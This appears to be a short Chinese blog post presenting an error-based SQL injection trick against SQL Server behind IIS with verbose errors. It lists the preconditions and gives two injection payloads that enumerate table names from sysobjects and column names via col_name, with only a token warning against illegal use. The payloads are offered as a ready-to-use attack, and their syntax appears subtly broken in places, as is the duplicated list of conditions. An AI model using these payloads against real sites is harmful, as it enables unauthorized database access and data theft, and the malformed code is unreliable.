本文介绍了一种针对 SQL Server 的特殊技巧,该技巧需要满足特定条件方可使用,包括找到注入点、数据库类型为 SQL Server 且 IIS 未屏蔽错误提示等。文章提供了具体的 SQL 语句用于获取表名及字段名。
必殺技成功條件:
1.找到注入點
2.數據庫為SQLSERVER
3.IIS沒屏蔽錯誤提示
1.找到注入點
2.數據庫為SQLSERVER
3.IIS沒屏蔽錯誤提示
注:因必殺技是我研究N久的心得,經多次改良,成功率極高。請不要用於不合法用途上,否則後果自負。
[N] = 第N個表
ID=1 and (Select top 1 name from(Select top [N] idname from sysobjects where xtype=char(85)) T order by id desc)>1
[T] = 表名
[N] = 第N個字段
ID=1 and (Select Top 1 col_name(object_id([T])[N]) from sysobjects)>1
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
